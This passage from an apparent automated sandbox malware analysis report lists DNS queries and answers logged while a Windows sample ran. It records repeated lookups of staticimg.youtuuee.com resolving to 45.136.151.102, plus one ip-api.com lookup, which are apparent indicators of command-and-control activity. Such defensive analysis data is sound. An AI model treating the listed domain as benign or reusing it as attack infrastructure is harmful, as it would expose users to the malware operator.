A (IP address) IN (0x0001)

Oct 24, 2021 09:47:38.997009039 CEST 192.168.2.5 8.8.8.8 0x4745 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:39.611651897 CEST 192.168.2.5 8.8.8.8 0xed77 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:40.232979059 CEST 192.168.2.5 8.8.8.8 0x1158 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:40.849301100 CEST 192.168.2.5 8.8.8.8 0x44a0 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:41.487714052 CEST 192.168.2.5 8.8.8.8 0x96c0 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:42.107141018 CEST 192.168.2.5 8.8.8.8 0x5c7b Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:42.728333950 CEST 192.168.2.5 8.8.8.8 0x461b Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Timestamp Source IP Dest IP Trans ID OP Code Name Type Class

Copyright Joe Security LLC 2021 Page 17 of 58

Page 18: Table of Contents 2 Windows Analysis Report 7PPXbfDkRN 3

Oct 24, 2021 09:47:43.352515936 CEST 192.168.2.5 8.8.8.8 0x9a08 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:43.974478006 CEST 192.168.2.5 8.8.8.8 0xcad7 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:44.910770893 CEST 192.168.2.5 8.8.8.8 0xa550 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:45.529999971 CEST 192.168.2.5 8.8.8.8 0x5f42 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:46.144649029 CEST 192.168.2.5 8.8.8.8 0xbac4 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:46.771471977 CEST 192.168.2.5 8.8.8.8 0x3771 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:47.387002945 CEST 192.168.2.5 8.8.8.8 0x7f47 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:47.994390965 CEST 192.168.2.5 8.8.8.8 0xf56e Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:48.600059986 CEST 192.168.2.5 8.8.8.8 0x360d Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:49.206872940 CEST 192.168.2.5 8.8.8.8 0x911c Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:49.799350977 CEST 192.168.2.5 8.8.8.8 0xfd3 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:50.410588980 CEST 192.168.2.5 8.8.8.8 0xe416 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:51.041132927 CEST 192.168.2.5 8.8.8.8 0xecad Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:51.645896912 CEST 192.168.2.5 8.8.8.8 0x5b5 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:52.257523060 CEST 192.168.2.5 8.8.8.8 0x36f Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:52.875586033 CEST 192.168.2.5 8.8.8.8 0x68de Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:53.473479033 CEST 192.168.2.5 8.8.8.8 0xf293 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:54.089143038 CEST 192.168.2.5 8.8.8.8 0x69a3 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:54.719775915 CEST 192.168.2.5 8.8.8.8 0x4eac Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:55.327100992 CEST 192.168.2.5 8.8.8.8 0xe83f Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:55.954521894 CEST 192.168.2.5 8.8.8.8 0xcc66 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:56.558793068 CEST 192.168.2.5 8.8.8.8 0xb24f Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:57.189415932 CEST 192.168.2.5 8.8.8.8 0xff Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:57.818434000 CEST 192.168.2.5 8.8.8.8 0xdca Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:58.437071085 CEST 192.168.2.5 8.8.8.8 0xcdaa Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:59.060106039 CEST 192.168.2.5 8.8.8.8 0x6f1c Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:59.656584978 CEST 192.168.2.5 8.8.8.8 0xcd41 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:48:00.264033079 CEST 192.168.2.5 8.8.8.8 0x7608 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:48:00.877664089 CEST 192.168.2.5 8.8.8.8 0x825b Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:48:01.487720013 CEST 192.168.2.5 8.8.8.8 0xcc3a Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:48:02.112385035 CEST 192.168.2.5 8.8.8.8 0x95a Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Timestamp Source IP Dest IP Trans ID OP Code Name Type Class

Timestamp Source IP Dest IP Trans ID Reply Code Name CName Address Type Class

Oct 24, 2021 09:46:11.976222992 CEST

8.8.8.8 192.168.2.5 0x9eb8 No error (0) ip-api.com 208.95.112.1 A (IP address) IN (0x0001)

Oct 24, 2021 09:46:12.482688904 CEST

8.8.8.8 192.168.2.5 0x70c5 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

DNS Answers

Copyright Joe Security LLC 2021 Page 18 of 58

Page 19: Table of Contents 2 Windows Analysis Report 7PPXbfDkRN 3

Oct 24, 2021 09:46:13.740453959 CEST

8.8.8.8 192.168.2.5 0xe681 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:46:14.915924072 CEST

8.8.8.8 192.168.2.5 0x31f3 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:46:15.947504997 CEST

8.8.8.8 192.168.2.5 0xe589 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:46:17.197069883 CEST

8.8.8.8 192.168.2.5 0x9dac No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:46:18.367758036 CEST

8.8.8.8 192.168.2.5 0x8498 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:46:19.863547087 CEST

8.8.8.8 192.168.2.5 0x84fe No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:46:21.295439005 CEST

8.8.8.8 192.168.2.5 0x8a28 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:46:22.591523886 CEST

8.8.8.8 192.168.2.5 0xe2c7 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:46:23.921989918 CEST

8.8.8.8 192.168.2.5 0x64d7 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:46:25.463247061 CEST

8.8.8.8 192.168.2.5 0xdace No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:46:26.984664917 CEST

8.8.8.8 192.168.2.5 0x6af1 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:46:28.622839928 CEST

8.8.8.8 192.168.2.5 0x5c0b No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:46:30.084511042 CEST

8.8.8.8 192.168.2.5 0xed9f No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:46:31.772547960 CEST

8.8.8.8 192.168.2.5 0xa4a9 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:46:33.425863028 CEST

8.8.8.8 192.168.2.5 0xe6d1 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:46:34.912228107 CEST

8.8.8.8 192.168.2.5 0xccc3 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:46:36.402184963 CEST

8.8.8.8 192.168.2.5 0xde90 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:46:37.854722977 CEST

8.8.8.8 192.168.2.5 0x3d9 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:46:39.137234926 CEST

8.8.8.8 192.168.2.5 0x2d99 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:46:40.732676983 CEST

8.8.8.8 192.168.2.5 0x4bb7 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:46:42.003353119 CEST

8.8.8.8 192.168.2.5 0x1393 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:46:43.150230885 CEST

8.8.8.8 192.168.2.5 0x493e No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:46:43.770291090 CEST

8.8.8.8 192.168.2.5 0x37a8 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:46:44.410131931 CEST

8.8.8.8 192.168.2.5 0x449d No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:46:45.035528898 CEST

8.8.8.8 192.168.2.5 0xc73e No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:46:45.675551891 CEST

8.8.8.8 192.168.2.5 0x9934 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Timestamp Source IP Dest IP Trans ID Reply Code Name CName Address Type Class

Copyright Joe Security LLC 2021 Page 19 of 58

Page 20: Table of Contents 2 Windows Analysis Report 7PPXbfDkRN 3

Oct 24, 2021 09:46:46.313957930 CEST

8.8.8.8 192.168.2.5 0xb8ed No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:46:46.943269014 CEST

8.8.8.8 192.168.2.5 0x34f7 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:46:47.591645002 CEST

8.8.8.8 192.168.2.5 0x367c No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:46:48.245228052 CEST

8.8.8.8 192.168.2.5 0x81a9 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:46:48.868161917 CEST

8.8.8.8 192.168.2.5 0xbe8f No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:46:49.503611088 CEST

8.8.8.8 192.168.2.5 0x8469 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:46:50.135504961 CEST

8.8.8.8 192.168.2.5 0x23af No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:46:50.767919064 CEST

8.8.8.8 192.168.2.5 0x35c No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:46:51.395010948 CEST

8.8.8.8 192.168.2.5 0x82eb No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:46:52.018250942 CEST

8.8.8.8 192.168.2.5 0xabd4 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:46:52.646979094 CEST

8.8.8.8 192.168.2.5 0x7d96 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:46:53.274059057 CEST

8.8.8.8 192.168.2.5 0xa1d4 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:46:53.904247999 CEST

8.8.8.8 192.168.2.5 0x82e6 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:46:54.530499935 CEST

8.8.8.8 192.168.2.5 0x4eba No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:46:55.171437979 CEST

8.8.8.8 192.168.2.5 0x29fb No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:46:55.796912909 CEST

8.8.8.8 192.168.2.5 0xb16d No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:46:56.437997103 CEST

8.8.8.8 192.168.2.5 0x187d No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:46:57.103617907 CEST

8.8.8.8 192.168.2.5 0x74ac No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:46:57.732459068 CEST

8.8.8.8 192.168.2.5 0xbf1d No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:46:58.361526012 CEST

8.8.8.8 192.168.2.5 0x9bba No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:46:58.979845047 CEST

8.8.8.8 192.168.2.5 0x42ad No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:46:59.605251074 CEST

8.8.8.8 192.168.2.5 0x800d No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:00.254426003 CEST

8.8.8.8 192.168.2.5 0x654a No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:00.873423100 CEST

8.8.8.8 192.168.2.5 0x1137 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:01.506788015 CEST

8.8.8.8 192.168.2.5 0x1ba No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:02.126943111 CEST

8.8.8.8 192.168.2.5 0x9dae No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Timestamp Source IP Dest IP Trans ID Reply Code Name CName Address Type Class

Copyright Joe Security LLC 2021 Page 20 of 58

Page 21: Table of Contents 2 Windows Analysis Report 7PPXbfDkRN 3

Oct 24, 2021 09:47:02.734566927 CEST

8.8.8.8 192.168.2.5 0xd880 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:03.373521090 CEST

8.8.8.8 192.168.2.5 0xc520 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:04.008299112 CEST

8.8.8.8 192.168.2.5 0x6619 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:04.630717039 CEST

8.8.8.8 192.168.2.5 0xa0c7 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:05.252378941 CEST

8.8.8.8 192.168.2.5 0xded4 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:05.897815943 CEST

8.8.8.8 192.168.2.5 0xc7b8 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:06.542243958 CEST

8.8.8.8 192.168.2.5 0xe70a No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:07.151657104 CEST

8.8.8.8 192.168.2.5 0xa97e No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:07.784101963 CEST

8.8.8.8 192.168.2.5 0xe8de No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:08.405812979 CEST

8.8.8.8 192.168.2.5 0x8d83 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:09.020821095 CEST

8.8.8.8 192.168.2.5 0x30ae No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:09.643799067 CEST

8.8.8.8 192.168.2.5 0x4a01 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:10.266096115 CEST

8.8.8.8 192.168.2.5 0x6280 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:10.980098009 CEST

8.8.8.8 192.168.2.5 0xdb87 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:11.975509882 CEST

8.8.8.8 192.168.2.5 0x197e No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:13.248315096 CEST

8.8.8.8 192.168.2.5 0x31c7 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:13.916690111 CEST

8.8.8.8 192.168.2.5 0x22e5 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:14.525177002 CEST

8.8.8.8 192.168.2.5 0x9cba No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:15.129575014 CEST

8.8.8.8 192.168.2.5 0xac31 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:15.741206884 CEST

8.8.8.8 192.168.2.5 0xc91 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:16.380837917 CEST

8.8.8.8 192.168.2.5 0xbb6 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:16.999514103 CEST

8.8.8.8 192.168.2.5 0xd77c No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:17.613404989 CEST

8.8.8.8 192.168.2.5 0x6291 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:18.568649054 CEST

8.8.8.8 192.168.2.5 0x852f No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:19.185070038 CEST

8.8.8.8 192.168.2.5 0x57a2 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:19.797535896 CEST

8.8.8.8 192.168.2.5 0xc556 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Timestamp Source IP Dest IP Trans ID Reply Code Name CName Address Type Class

Copyright Joe Security LLC 2021 Page 21 of 58

Page 22: Table of Contents 2 Windows Analysis Report 7PPXbfDkRN 3

Oct 24, 2021 09:47:20.399183989 CEST

8.8.8.8 192.168.2.5 0x46f3 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:21.013571978 CEST

8.8.8.8 192.168.2.5 0xf185 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:21.621269941 CEST

8.8.8.8 192.168.2.5 0x1604 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:22.251352072 CEST

8.8.8.8 192.168.2.5 0x94b No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:22.899736881 CEST

8.8.8.8 192.168.2.5 0x47d3 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:23.521917105 CEST

8.8.8.8 192.168.2.5 0xf03d No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:24.131295919 CEST

8.8.8.8 192.168.2.5 0xc178 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:24.780937910 CEST

8.8.8.8 192.168.2.5 0x3452 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:25.413681030 CEST

8.8.8.8 192.168.2.5 0xcb54 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:26.027328968 CEST

8.8.8.8 192.168.2.5 0xcbc1 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:26.631810904 CEST

8.8.8.8 192.168.2.5 0xcd1c No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:27.253463030 CEST

8.8.8.8 192.168.2.5 0xbda2 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:27.865590096 CEST

8.8.8.8 192.168.2.5 0xc3e3 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:28.457813978 CEST

8.8.8.8 192.168.2.5 0xd6db No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:29.146256924 CEST

8.8.8.8 192.168.2.5 0x54b1 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:29.783416033 CEST

8.8.8.8 192.168.2.5 0x7045 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:30.829247952 CEST

8.8.8.8 192.168.2.5 0x38d8 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:32.173935890 CEST

8.8.8.8 192.168.2.5 0xc19c No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:32.807846069 CEST

8.8.8.8 192.168.2.5 0xa789 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:33.433953047 CEST

8.8.8.8 192.168.2.5 0xd6e6 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:34.074692965 CEST

8.8.8.8 192.168.2.5 0x829b No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:34.699784040 CEST

8.8.8.8 192.168.2.5 0x7737 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:35.329610109 CEST

8.8.8.8 192.168.2.5 0xa830 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:35.929393053 CEST

8.8.8.8 192.168.2.5 0x9192 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:36.531472921 CEST

8.8.8.8 192.168.2.5 0x8a43 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:37.161864996 CEST

8.8.8.8 192.168.2.5 0x9f3b No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Timestamp Source IP Dest IP Trans ID Reply Code Name CName Address Type Class

Copyright Joe Security LLC 2021 Page 22 of 58

Page 23: Table of Contents 2 Windows Analysis Report 7PPXbfDkRN 3

Oct 24, 2021 09:47:37.784832954 CEST

8.8.8.8 192.168.2.5 0xa3aa No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:38.405206919 CEST

8.8.8.8 192.168.2.5 0x84a2 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:39.014890909 CEST

8.8.8.8 192.168.2.5 0x4745 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:39.629781961 CEST

8.8.8.8 192.168.2.5 0xed77 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:40.251389027 CEST

8.8.8.8 192.168.2.5 0x1158 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:40.867505074 CEST

8.8.8.8 192.168.2.5 0x44a0 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:41.505384922 CEST

8.8.8.8 192.168.2.5 0x96c0 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:42.125135899 CEST

8.8.8.8 192.168.2.5 0x5c7b No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:42.746428013 CEST

8.8.8.8 192.168.2.5 0x461b No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:43.370395899 CEST

8.8.8.8 192.168.2.5 0x9a08 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:43.990777969 CEST

8.8.8.8 192.168.2.5 0xcad7 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:44.929102898 CEST

8.8.8.8 192.168.2.5 0xa550 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:45.547961950 CEST

8.8.8.8 192.168.2.5 0x5f42 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:46.162534952 CEST

8.8.8.8 192.168.2.5 0xbac4 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:46.789660931 CEST

8.8.8.8 192.168.2.5 0x3771 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:47.404970884 CEST

8.8.8.8 192.168.2.5 0x7f47 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:48.012718916 CEST

8.8.8.8 192.168.2.5 0xf56e No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:48.618808985 CEST

8.8.8.8 192.168.2.5 0x360d No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:49.225338936 CEST

8.8.8.8 192.168.2.5 0x911c No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:49.817647934 CEST

8.8.8.8 192.168.2.5 0xfd3 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:50.428714991 CEST

8.8.8.8 192.168.2.5 0xe416 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:51.059173107 CEST

8.8.8.8 192.168.2.5 0xecad No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:51.661578894 CEST

8.8.8.8 192.168.2.5 0x5b5 No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:52.275777102 CEST

8.8.8.8 192.168.2.5 0x36f No error (0) staticimg.youtuuee.com

45.136.151.102 A (IP address) IN (0x0001)

Oct 24, 2021 09:47:52.893830061 CEST

8.8.8.8 192.168.2.5 0x68de No error (0) staticimg.youtuuee.com

